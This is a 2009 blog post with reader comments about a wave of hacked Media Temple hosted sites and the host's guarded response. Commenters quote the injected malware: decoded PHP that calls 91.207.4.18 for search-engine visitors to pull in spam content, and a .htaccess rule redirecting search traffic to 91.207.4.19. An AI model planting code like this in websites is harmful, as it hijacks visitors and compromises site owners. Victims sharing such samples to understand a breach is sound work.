UPDATE – I just spoke with the VP of customer service at media temple. It seems as though there is a lot in the works. He wanted to reassure me that their reaction to this has been very carefully thought out, and that they are currently investigating the hacks.
While I generally want to know everything about anything immediately as it happens, I understand that if MT handled this that way it could lead to a situation where an exploit was widely disseminated before the vendors had a chance to patch it. There are an incredible number of pieces of hardware and software involved, and it only takes one exploitable piece to create a problem.
In short, sit tight. Media Temple will hopefully release more info when the time is right. In the meantime you can rest assured that their measured reaction is the result of careful consideration, not sloth.
I will leave the original post below quoted for reference.
There aren’t many answers here, but recently this site was hacked (which is bad) and my host Media temple saw errant behavior, (and recognized it) changed the ftp password, and restored backup to the site (which was good!)
At first I was not very upset. These things happen, and it seemed like media temple did the right thing in a timely manner. Then today I searched for one of the php files the hackers had put up on my site and discovered this page (google cache) which has quite a few other sites that had been hacked in a similar fashion. Something very fishy seems to be going on here.
Media temple sent out an email blaming the hacks on old ftp passwords. That would make sense if it was a handful, but hundreds of sites? That sounds like something only Media temple could screw up.
I sent in a ticket asking them if they had been compromised. I’ll update it when I have an update. Personally I am much more upset about media temple’s failed coverup than I am about media temple getting hacked.
Here are a few links from other people who seem to have caught the story earlier then I. One guy had his blog hacked twice!
http://www.inquisitr.com/47860/the-epic-wordpress-mediatemple-failure/
http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/
We definitely appreciate the update.
Happened to me. Three less-than-important Drupal sites. I began evacuating the grid months ago.
In the meantime, whilst sitting tight, all our sites have porn links on them. Great!
I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but none of them had wordpress installed. There’s no way the FTP passwords could have all been hacked.
The encoded PHP evaluates to this:
if(stripos($_SERVER[‘HTTP_USER_AGENT’], ‘google’) or stripos($_SERVER[‘HTTP_USER_AGENT’], ‘yahoo’) or stripos($_SERVER[‘HTTP_USER_AGENT’], ‘msn’) or stripos($_SERVER[‘HTTP_USER_AGENT’], ‘live’))
{
$r = ”;
if($f=@fsockopen(‘91.207.4.18’,80,$e,$er,10) and @fputs($f, “GET /linkit/in.php?domain=” . urlencode($_SERVER[“SERVER_NAME”]) . “&useragent=” . urlencode($_SERVER[‘HTTP_USER_AGENT’]) . ” HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n”))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,”\r\n\r\n”); echo substr($r,$p+4);
}
My media temple sites were hacked too last night.
Got the same php code added to my index.php files, but the code never worked. Instead all requests returned with an error, which is not much better…
Yep I was hacked too, all sites on my account had .htaccess changed or added :
AddHandler php-script .html .htm
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://91.207.4.19/tds/go.php?sid=1 [R,L]
And also ALL index.html and links.html files across all accounts had been changed.
On speaking with a tech at MT he was very hesitant to even mention the word hack or admit the fact, and only confirmed what I knew and would not explain anything at all. This is all very fishy!
One of my client’s sites was hacked, too, and I’m no expert on internet security, but I do believe that there was nothing in the code that could have been exploited. This site used NO CMS, was and coded, had no forms, and the only PHP in was used for includes (headers, footers, etc.) and to parse a static XML file. This one seems to be totally on Media Temple.